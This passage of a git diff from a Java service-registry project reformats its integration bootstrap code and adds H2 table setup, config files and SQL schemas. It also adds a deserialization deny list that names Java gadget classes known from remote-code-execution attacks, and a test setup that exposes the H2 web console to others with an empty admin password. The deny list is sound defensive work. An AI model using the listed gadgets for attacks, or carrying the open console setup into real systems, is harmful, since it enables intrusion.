"-webAllowOthers", "-webPort", "9630").start(); + } + + // start meta + SpringApplicationBuilder springApplicationBuilder = + new SpringApplicationBuilder(MetaApplication.class); + springApplicationBuilder.parent(commonContext); + metaApplicationContext = springApplicationBuilder.run(); - // wait meta cluster start - waitClusterStart(serverList, - Integer.parseInt(commonContext.getEnvironment().getProperty(META_HTTP_SERVER_PORT))); + // wait meta cluster start + waitClusterStart( + serverList, + Integer.parseInt(commonContext.getEnvironment().getProperty(META_HTTP_SERVER_PORT))); - // start data - dataApplicationContext = new SpringApplicationBuilder(DataApplication.class).parent(commonContext).run(); + // start data + dataApplicationContext = + new SpringApplicationBuilder(DataApplication.class).parent(commonContext).run(); - // wait data cluster start - waitClusterStart(serverList, - Integer.parseInt(commonContext.getEnvironment().getProperty(DATA_HTTP_SERVER_PORT))); + // wait data cluster start + waitClusterStart( + serverList, + Integer.parseInt(commonContext.getEnvironment().getProperty(DATA_HTTP_SERVER_PORT))); - // start session - sessionApplicationContext = new SpringApplicationBuilder(SessionApplication.class).parent(commonContext).run(); + // start session + sessionApplicationContext = + new SpringApplicationBuilder(SessionApplication.class).parent(commonContext).run(); - // wait session cluster start - waitClusterStart(serverList, - Integer.parseInt(commonContext.getEnvironment().getProperty(SESSION_HTTP_SERVER_PORT))); + // wait session cluster start + waitClusterStart( + serverList, + Integer.parseInt(commonContext.getEnvironment().getProperty(SESSION_HTTP_SERVER_PORT))); + } + + public static void stop() { + if (sessionApplicationContext != null) { + sessionApplicationContext + .getBean("sessionServerBootstrap", SessionServerBootstrap.class) + .destroy(); } - public static void stop() { - if (sessionApplicationContext != null) { - sessionApplicationContext.getBean("sessionServerBootstrap", - SessionServerBootstrap.class).destroy(); - } + if (dataApplicationContext != null) { + dataApplicationContext.getBean("dataServerBootstrap", DataServerBootstrap.class).destroy(); + } - if (dataApplicationContext != null) { - dataApplicationContext.getBean("dataServerBootstrap", DataServerBootstrap.class) - .destroy(); - } + if (metaApplicationContext != null) { + metaApplicationContext.getBean("metaServerBootstrap", MetaServerBootstrap.class).destroy(); + } + } + + private static Collection getServerList(ConfigurableApplicationContext commonContext) { + String metaNodes = commonContext.getEnvironment().getProperty(META_NODES); + String localDataCenter = commonContext.getEnvironment().getProperty(NODES_LOCAL_DATA_CENTER); + return new PropertySplitter().mapOfList(metaNodes).get(localDataCenter); + } - if (metaApplicationContext != null) { - metaApplicationContext.getBean("metaServerBootstrap", MetaServerBootstrap.class) - .destroy(); + private static void waitClusterStart(Collection serverList, int httpPort) + throws Exception { + for (String serverAddress : serverList) { + while (true) { + if (nodeHealthCheck(serverAddress, httpPort)) { + LOGGER.info("{}:{} health check success.", serverAddress, httpPort); + break; } + LOGGER.error("{}:{} health check failed.", serverAddress, httpPort); + Thread.sleep(1000); + } } + } - private static Collection getServerList(ConfigurableApplicationContext commonContext) { - String metaNodes = commonContext.getEnvironment().getProperty(META_NODES); - String localDataCenter = commonContext.getEnvironment() - .getProperty(NODES_LOCAL_DATA_CENTER); - return new PropertySplitter().mapOfList(metaNodes).get(localDataCenter); + private static boolean nodeHealthCheck(String serverAddress, int httpPort) { + CommonResponse resp = null; + try { + JerseyClient jerseyClient = JerseyClient.getInstance(); + Channel channel = jerseyClient.connect(new URL(serverAddress, httpPort)); + LOGGER.info("{}:{} health check", serverAddress, httpPort); + resp = + channel + .getWebTarget() + .path("health/check") + .request(APPLICATION_JSON) + .get(CommonResponse.class); + return resp.isSuccess(); + } catch (Throwable t) { + LOGGER.error("{}:{} health check failed. {}", serverAddress, httpPort, resp, t); + return false; } + } - private static void waitClusterStart(Collection serverList, int httpPort) - throws Exception { - for (String serverAddress : serverList) { - while (true) { - if (nodeHealthCheck(serverAddress, httpPort)) { - LOGGER.info("{}:{} health check success.", serverAddress, httpPort); - break; - } - LOGGER.error("{}:{} health check failed.", serverAddress, httpPort); - Thread.sleep(1000); - } - } + public static ConfigurableApplicationContext getMetaApplicationContext() { + return metaApplicationContext; + } + + public static ConfigurableApplicationContext getSessionApplicationContext() { + return sessionApplicationContext; + } + + public static ConfigurableApplicationContext getDataApplicationContext() { + return dataApplicationContext; + } + + public static FileInputStream openInputStream(File file) throws IOException { + if (file.exists()) { + if (file.isDirectory()) { + throw new IOException("File '" + file + "' exists but is a directory"); + } + if (!file.canRead()) { + throw new IOException("File '" + file + "' cannot be read"); + } + } else { + throw new FileNotFoundException("File '" + file + "' does not exist"); + } + return new FileInputStream(file); + } + + private static void createTables(ConfigurableApplicationContext commonContext) + throws ClassNotFoundException, SQLException, IOException { + String driver = commonContext.getEnvironment().getProperty("jdbc.driverClassName"); + Class.forName(driver); + String url = commonContext.getEnvironment().getProperty("jdbc.url"); + String username = commonContext.getEnvironment().getProperty("jdbc.username"); + String password = commonContext.getEnvironment().getProperty("jdbc.password"); + Connection connection = null; + try { + connection = DriverManager.getConnection(url, username, password); + executeSqlScript(connection, readFileAsString("sql/h2/create_table.sql")); + } finally { + if (connection != null) { + connection.close(); + } + } + } + + public static String readFileAsString(String fileName) throws IOException { + + try (InputStream ins = getFileInputStream(fileName)) { + String fileContent = IOUtils.toString(ins); + return fileContent; } + } - private static boolean nodeHealthCheck(String serverAddress, int httpPort) { + public static InputStream getFileInputStream(String fileName) throws FileNotFoundException { + + return getFileInputStream("./", fileName, FileUtils.class); + } + + public static InputStream getFileInputStream(String path, String fileName, Class clazz) + throws FileNotFoundException { + + File f = null; + if (path != null) { + f = new File(path + "/" + fileName); + if (f.exists()) { try { - JerseyClient jerseyClient = JerseyClient.getInstance(); - Channel channel = jerseyClient.connect(new URL(serverAddress, httpPort)); - return channel.getWebTarget().path("health/check").request(APPLICATION_JSON) - .get(CommonResponse.class).isSuccess(); - } catch (Throwable t) { - LOGGER.error("{}:{} health check failed.", serverAddress, httpPort, t); - return false; + LOGGER.info("[getFileInputStream]{}", f.getAbsolutePath()); + return new FileInputStream(f); + } catch (IOException e) { + throw new IllegalArgumentException("file load fail:" + f, e); } + } + } + + // try file + f = new File(fileName); + if (f.exists()) { + try { + LOGGER.info("[getFileInputStream]{}", f.getAbsolutePath()); + return new FileInputStream(f); + } catch (IOException e) { + throw new IllegalArgumentException("file load fail:" + f, e); + } } - public static ConfigurableApplicationContext getMetaApplicationContext() { - return metaApplicationContext; + // try classpath + java.net.URL url = clazz.getResource(fileName); + if (url == null) { + url = clazz.getClassLoader().getResource(fileName); + } + if (url != null) { + try { + LOGGER.info("[load]{}", url); + return url.openStream(); + } catch (IOException e) { + throw new IllegalArgumentException("classpath load fail:" + url, e); + } } - public static ConfigurableApplicationContext getSessionApplicationContext() { - return sessionApplicationContext; + throw new FileNotFoundException(path + "," + fileName); + } + + protected static void executeSqlScript(Connection connection, String prepareSql) + throws SQLException { + if (StringUtils.isEmpty(prepareSql)) { + return; } + java.sql.Connection conn = connection; + PreparedStatement stmt = null; + try { + conn.setAutoCommit(false); + if (!Strings.isEmpty(prepareSql)) { + for (String sql : prepareSql.split(";")) { + LOGGER.debug("[setup][data]{}", sql.trim()); + stmt = conn.prepareStatement(sql); + stmt.executeUpdate(); + } + } + conn.commit(); - public static ConfigurableApplicationContext getDataApplicationContext() { - return dataApplicationContext; + } catch (Exception ex) { + LOGGER.error("[SetUpTestDataSource][fail]:", ex); + if (null != conn) { + conn.rollback(); + } + } finally { + if (null != stmt) { + stmt.close(); + } + if (null != conn) { + conn.setAutoCommit(true); + conn.close(); + } } + } } diff --git a/server/server/integration/src/main/resources/application-integrate.properties b/server/server/integration/src/main/resources/application-integrate.properties new file mode 100644 index 000000000..7ca1d5ed3 --- /dev/null +++ b/server/server/integration/src/main/resources/application-integrate.properties @@ -0,0 +1,84 @@ +spring.main.banner-mode=LOG +nodes.metaNode=DefaultDataCenter:localhost +nodes.localDataCenter=DefaultDataCenter +nodes.localRegion=DEFAULT_ZONE +#server.logging.home=/home/admin/logs/registry + +#meta.server.logging.level=INFO +#meta.server.logging.home=/home/admin/logs/registry/meta +meta.server.sessionServerPort=9610 +meta.server.dataServerPort=9611 +meta.server.metaServerPort=9612 +meta.server.raftServerPort=9614 +meta.server.httpServerPort=9615 +meta.server.raftGroup=MetaServerRaftGroup + +#data.server.logging.level=INFO +#data.server.logging.home=/home/admin/logs/registry/data +data.server.port=9620 +data.server.syncSessionPort=9602 +data.server.syncDataPort=9621 +data.server.httpServerPort=9622 +data.server.queueCount=4 +data.server.queueSize=10240 +data.server.notifyIntervalMs=500 +data.server.rpcTimeout=3000 +data.server.metaServerPort=9611 +data.server.storeNodes=3 +data.server.numberOfReplicas=1000 + +#session.server.logging.level=INFO +#session.server.logging.home=/home/admin/logs/registry/session +session.server.serverPort=9600 +session.server.syncSessionPort=9602 +session.server.serverSyncPort=9601 +session.server.httpServerPort=9603 +session.server.metaServerPort=9610 +session.server.dataServerPort=9620 +session.server.serverDescription=dev session server +session.server.sessionServerRegion=DEFAULT_ZONE +session.server.sessionServerDataCenter=DefaultDataCenter +session.server.syncHeartbeat.fixedDelay=30000 +session.server.syncExceptionData.fixedDelay=30000 +session.server.printTask.fixedDelay=30000 +session.server.schedulerCheckVersionTimeout=3 +session.server.schedulerCheckVersionFirstDelay=3 +session.server.schedulerCheckVersionExpBackOffBound=10 +session.server.schedulerHeartbeatTimeout=3 +session.server.schedulerHeartbeatFirstDelay=3 +session.server.schedulerHeartbeatExpBackOffBound=1 +session.server.schedulerFetchDataTimeout=3 +session.server.schedulerFetchDataFirstDelay=3 +session.server.schedulerFetchDataExpBackOffBound=10 +#session.server.invalidForeverZones=; +#session.server.invalidIgnoreDataidRegex= +#session.server.pushEmptyDataDataIdPrefixes= +session.server.silenceHore=24 + + +## connect db +persistence.profile.active=jdbc +spring.h2.console.enabled=true +server.port = 8044 +jdbc.driverClassName=org.h2.Driver +jdbc.url=jdbc:h2:mem:metadatadb;DB_CLOSE_DELAY=-1;MODE=MySQL;MV_STORE=FALSE +jdbc.username=sa +jdbc.password= +spring.datasource.schema=sql/h2/create_table.sql +#spring.datasource.data=sql/h2/base_info.sql + + +#jdbc.typeAliasesPackage=com.alipay.sofa.registry.jdbc.domain +jdbc.mapperLocations=classpath:h2-mapper/*.xml + +spring.jmx.enabled=false + +meta.server.elector.lockExpireDuration=20000 +meta.server.revisionGcSilenceHour=24 +meta.server.revisionGcInitialDelayMillis=60000 +meta.server.revisionGcMillis=60000 + + + + + diff --git a/server/server/integration/src/main/resources/application.properties b/server/server/integration/src/main/resources/application.properties deleted file mode 100644 index 08a6b78f2..000000000 --- a/server/server/integration/src/main/resources/application.properties +++ /dev/null @@ -1,53 +0,0 @@ -spring.main.banner-mode=LOG -#nodes.metaNode=: -#nodes.localDataCenter= -#nodes.localRegion= -#server.logging.home=/home/admin/logs/registry - -#meta.server.logging.level=INFO -#meta.server.logging.home=/home/admin/logs/registry/meta -meta.server.sessionServerPort=9610 -meta.server.dataServerPort=9611 -meta.server.metaServerPort=9612 -meta.server.raftServerPort=9614 -meta.server.httpServerPort=9615 -meta.server.raftGroup=MetaServerRaftGroup - -#data.server.logging.level=INFO -#data.server.logging.home=/home/admin/logs/registry/data -data.server.port=9620 -data.server.syncDataPort=9621 -data.server.httpServerPort=9622 -data.server.queueCount=4 -data.server.queueSize=10240 -data.server.notifyIntervalMs=500 -data.server.rpcTimeout=3000 -data.server.metaServerPort=9611 -data.server.storeNodes=3 -data.server.numberOfReplicas=1000 - -#session.server.logging.level=INFO -#session.server.logging.home=/home/admin/logs/registry/session -session.server.serverPort=9600 -session.server.serverSyncPort=9601 -session.server.httpServerPort=9603 -session.server.metaServerPort=9610 -session.server.dataServerPort=9620 -session.server.serverDescription=dev session server -session.server.sessionServerRegion=DEFAULT_ZONE -session.server.sessionServerDataCenter=DefaultDataCenter -session.server.syncHeartbeat.fixedDelay=30000 -session.server.syncExceptionData.fixedDelay=30000 -session.server.printTask.fixedDelay=30000 -session.server.schedulerCheckVersionTimeout=3 -session.server.schedulerCheckVersionFirstDelay=3 -session.server.schedulerCheckVersionExpBackOffBound=10 -session.server.schedulerHeartbeatTimeout=30 -session.server.schedulerHeartbeatFirstDelay=30 -session.server.schedulerHeartbeatExpBackOffBound=10 -session.server.schedulerFetchDataTimeout=3 -session.server.schedulerFetchDataFirstDelay=3 -session.server.schedulerFetchDataExpBackOffBound=10 -#session.server.invalidForeverZones=; -#session.server.invalidIgnoreDataidRegex= -#session.server.pushEmptyDataDataIdPrefixes= \ No newline at end of file diff --git a/server/server/integration/src/main/resources/log4j2.xml b/server/server/integration/src/main/resources/log4j2.xml new file mode 100644 index 000000000..9be037aa6 --- /dev/null +++ b/server/server/integration/src/main/resources/log4j2.xml @@ -0,0 +1,532 @@ + + + + + + ${registry.integration.home}/logs + ${registry.integration.home}/logs/meta + ${registry.integration.home}/logs/data + ${registry.integration.home}/logs/session + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/server/integration/src/main/resources/logback-spring.xml b/server/server/integration/src/main/resources/logback-spring.xml deleted file mode 100644 index 167ae8744..000000000 --- a/server/server/integration/src/main/resources/logback-spring.xml +++ /dev/null @@ -1,538 +0,0 @@ - - - - - - - - - - - - - - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - - - - - true - - ERROR - - ${LOG_HOME}/common-error.log - - ${LOG_HOME}/common-error.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${LOG_HOME}/common-default.log - - ${LOG_HOME}/common-default.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${LOG_HOME}/registry-raft.log - - ${LOG_HOME}/registry-raft.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${LOG_HOME}/registry-startup.log - - ${LOG_HOME}/registry-startup.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-meta.log - - ${META_LOG_HOME}/registry-meta.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-connect.log - - ${META_LOG_HOME}/registry-connect.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-raft-metrics.log - - ${META_LOG_HOME}/registry-raft-metrics.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-http.log - - ${META_LOG_HOME}/registry-http.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/registry-data.log - - ${DATA_LOG_HOME}/registry-data.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/datum-change.log - - ${DATA_LOG_HOME}/datum-change.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/cache-digest.log - - ${DATA_LOG_HOME}/cache-digest.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/profile-digest.log - - ${DATA_LOG_HOME}/profile-digest.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/registry-http.log - - ${DATA_LOG_HOME}/registry-http.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-session.log - - ${SESSION_LOG_HOME}/registry-session.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-connect.log - - ${SESSION_LOG_HOME}/registry-connect.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-console.log - - ${SESSION_LOG_HOME}/registry-console.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-exchange.log - - ${SESSION_LOG_HOME}/registry-exchange.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-push.log - - ${SESSION_LOG_HOME}/registry-push.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-profile-digest.log - - ${SESSION_LOG_HOME}/registry-profile-digest.log.%d{yyyy-MM-dd} - 10 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - 0 - 1024 - - - - - 0 - 1024 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/server/server/integration/src/main/resources/security/blacklist.txt b/server/server/integration/src/main/resources/security/blacklist.txt new file mode 100644 index 000000000..e3413f8d4 --- /dev/null +++ b/server/server/integration/src/main/resources/security/blacklist.txt @@ -0,0 +1,78 @@ +org.codehaus.groovy.runtime.MethodClosure +clojure.core$constantly +clojure.main$eval_opt +com.alibaba.citrus.springext.support.parser.AbstractNamedProxyBeanDefinitionParser$ProxyTargetFactory +com.alibaba.citrus.springext.support.parser.AbstractNamedProxyBeanDefinitionParser$ProxyTargetFactoryImpl +com.alibaba.citrus.springext.util.SpringExtUtil.AbstractProxy +com.alipay.custrelation.service.model.redress.Pair +com.caucho.hessian.test.TestCons +com.mchange.v2.c3p0.JndiRefForwardingDataSource +com.mchange.v2.c3p0.WrapperConnectionPoolDataSource +com.rometools.rome.feed.impl.EqualsBean +com.rometools.rome.feed.impl.ToStringBean +com.sun.jndi.rmi.registry.BindingEnumeration +com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl +com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl +com.sun.rowset.JdbcRowSetImpl +com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data +java.rmi.server.UnicastRemoteObject +java.security.SignedObject +java.util.ServiceLoader$LazyIterator +javax.imageio.ImageIO$ContainsFilter +javax.imageio.spi.ServiceRegistry +javax.management.BadAttributeValueExpException +javax.naming.InitialContext +javax.naming.spi.ObjectFactory +javax.script.ScriptEngineManager +javax.sound.sampled.AudioFormat$Encoding +org.apache.carbondata.core.scan.expression.ExpressionResult +org.apache.commons.dbcp +org.apache.commons.dbcp2 +org.apache.commons.beanutils +org.apache.ibatis.executor.loader.AbstractSerialStateHolder +org.apache.ibatis.executor.loader.CglibSerialStateHolder +org.apache.ibatis.executor.loader.JavassistSerialStateHolder +org.apache.ibatis.executor.loader.cglib.CglibProxyFactory +org.apache.ibatis.executor.loader.javassist.JavassistSerialStateHolder +org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource +org.apache.wicket.util.upload.DiskFileItem +org.apache.xalan.xsltc.trax.TemplatesImpl +org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding +org.apache.xpath.XPathContext +org.eclipse.jetty.util.log.LoggerLog +org.geotools.filter.ConstantExpression +org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder +org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor +org.springframework.beans.factory.BeanFactory +org.springframework.beans.factory.config.PropertyPathFactoryBean +org.springframework.beans.factory.support.DefaultListableBeanFactory +org.springframework.jndi.support.SimpleJndiBeanFactory +org.springframework.orm.jpa.AbstractEntityManagerFactoryBean +org.springframework.transaction.jta.JtaTransactionManager +org.yaml.snakeyaml.tokens.DirectiveToken +sun.rmi.server.UnicastRef +javax.management.ImmutableDescriptor +org.springframework.jndi.JndiObjectTargetSource +ch.qos.logback.core.db.JNDIConnectionSource +java.beans.Expression +javassist.bytecode +javassist.tools.web.Viewer +javassist.util.proxy.SerializedProxy +org.apache.ibatis.javassist.bytecode +org.apache.ibatis.javassist.tools.web.Viewer +org.apache.ibatis.javassist.util.proxy.SerializedProxy +org.springframework.beans.factory.config.MethodInvokingFactoryBean +com.alibaba.druid +com.sun.corba +com.sun.org.apache.bcel +com.sun.org.apache.xml +com.sun.org.apache.xpath +org.apache.zookeeper.Shell +org.apache.tomcat.dbcp.dbcp.BasicDataSource +net.bytebuddy.dynamic.loading.ByteArrayClassLoader +org.jboss.resteasy.plugins +org.springframework.beans.BeanWrapperImpl$BeanPropertyHandler +org.apache.velocity.runtime.resource.Resource +org.springframework.expression.spel.ast.Indexer$PropertyIndexingValueRef +org.mortbay.log.Slf4jLog +org.springframework.expression.spel.ast.MethodReference$MethodValueRef \ No newline at end of file diff --git a/server/server/integration/src/main/resources/sql/h2/base_info.sql b/server/server/integration/src/main/resources/sql/h2/base_info.sql new file mode 100644 index 000000000..e69de29bb diff --git a/server/server/integration/src/main/resources/sql/h2/create_table.sql b/server/server/integration/src/main/resources/sql/h2/create_table.sql new file mode 100644 index 000000000..0587c844f --- /dev/null +++ b/server/server/integration/src/main/resources/sql/h2/create_table.sql @@ -0,0 +1,61 @@ +drop table if exists APP_REVISION; +create table APP_REVISION ( + id bigint unsigned not null auto_increment primary key, + data_center varchar(129) not null, + revision varchar(128) not null, + app_name varchar(128) not null, + base_params longtext default null, + service_params longtext default null, + gmt_create timestamp not null, + gmt_modified timestamp not null, + client_version varchar(512) default null, + UNIQUE KEY `uk_data_center_revision` (`data_center`, `revision`) +); + +CREATE TABLE interface_apps_index ( + id bigint(20) NOT NULL AUTO_INCREMENT, + data_center varchar(128) NOT NULL, + app_name varchar(128) NOT NULL COMMENT '应用名', + interface_name varchar(386) NOT NULL COMMENT '接口名', + gmt_create timestamp(6) NOT NULL COMMENT '创建时间', + gmt_modified timestamp(6) NOT NULL COMMENT '修改时间', + hashcode varchar(128) NOT NULL COMMENT '唯一索引hashcode', + reference tinyint(4) NOT NULL COMMENT '是否被引用', + PRIMARY KEY(id), + UNIQUE KEY `uk_hashcode` (`data_center`, `app_name`, `hashcode`), + KEY `idx_data_center_interface` (`interface_name`) +); + +CREATE TABLE distribute_lock ( + id bigint(20) NOT NULL AUTO_INCREMENT primary key, + data_center varchar(128) NOT NULL, + lock_name varchar(1024) NOT NULL, + owner varchar(512) NOT NULL, + duration bigint(20) NOT NULL, + gmt_create timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP, + gmt_modified timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP, + UNIQUE KEY `uk_data_center_lock` (`data_center`, `lock_name`), + KEY `idx_lock_owner` (`owner`) +); + +CREATE TABLE provide_data ( + id bigint(20) NOT NULL AUTO_INCREMENT primary key, + data_center varchar(128) NOT NULL, + data_key varchar(1024) NOT NULL, + data_value mediumtext DEFAULT NULL , + gmt_create timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, + gmt_modified timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, + `data_version` bigint(20) NOT NULL DEFAULT '0' COMMENT '版本号', + UNIQUE KEY `uk_data_center_key` (`data_center`, `data_key`) +); + + + + + + + + + + + diff --git a/server/server/integration/src/main/resources/sql/mysql/create_table.sql b/server/server/integration/src/main/resources/sql/mysql/create_table.sql new file mode 100644 index 000000000..b6147a14f --- /dev/null +++ b/server/server/integration/src/main/resources/sql/mysql/create_table.sql @@ -0,0 +1,68 @@ +CREATE TABLE `app_revision` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `revision` varchar(128) NOT NULL COMMENT 'revision', + `app_name` varchar(128) NOT NULL COMMENT '应用名', + `base_params` text DEFAULT NULL COMMENT '基础参数', + `service_params` text DEFAULT NULL COMMENT '服务参数', + `gmt_create` timestamp NOT NULL COMMENT '创建时间', + `gmt_modified` timestamp NOT NULL COMMENT '修改时间', + `client_version` varchar(512) DEFAULT NULL COMMENT '客户端版本', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_revision` (`data_center`, `revision`) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 913172 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '服务元数据表' + +CREATE TABLE `interface_apps_index` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名称', + `app_name` varchar(128) NOT NULL COMMENT '应用名', + `interface_name` varchar(386) NOT NULL COMMENT '接口名', + `gmt_create` timestamp(6) NOT NULL COMMENT '创建时间', + `gmt_modified` timestamp(6) NOT NULL COMMENT '修改时间', + `hashcode` varchar(128) NOT NULL COMMENT '唯一索引hashcode', + `reference` tinyint(4) NOT NULL COMMENT '是否被引用', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_hashcode` (`data_center`, `app_name`, `hashcode`) BLOCK_SIZE 16384 GLOBAL, + KEY `idx_data_center_interface` (`interface_name`) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1469202 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = 'interface与revision索引表' + +CREATE TABLE `provide_data` ( + `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `data_key` varchar(1024) NOT NULL COMMENT 'data key', + `data_value` mediumtext DEFAULT NULL COMMENT 'data value', + `gmt_create` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', + `gmt_modified` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT '修改时间', + `data_version` bigint(20) unsigned NOT NULL DEFAULT '0' COMMENT '版本号', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_key` (`data_center`(128), `data_key`(1024)) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '注册中心配置存储表' + +CREATE TABLE `distribute_lock` ( + `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `lock_name` varchar(1024) NOT NULL COMMENT '分布式锁名称', + `owner` varchar(512) NOT NULL COMMENT '锁拥有者', + `duration` bigint(20) NOT NULL COMMENT 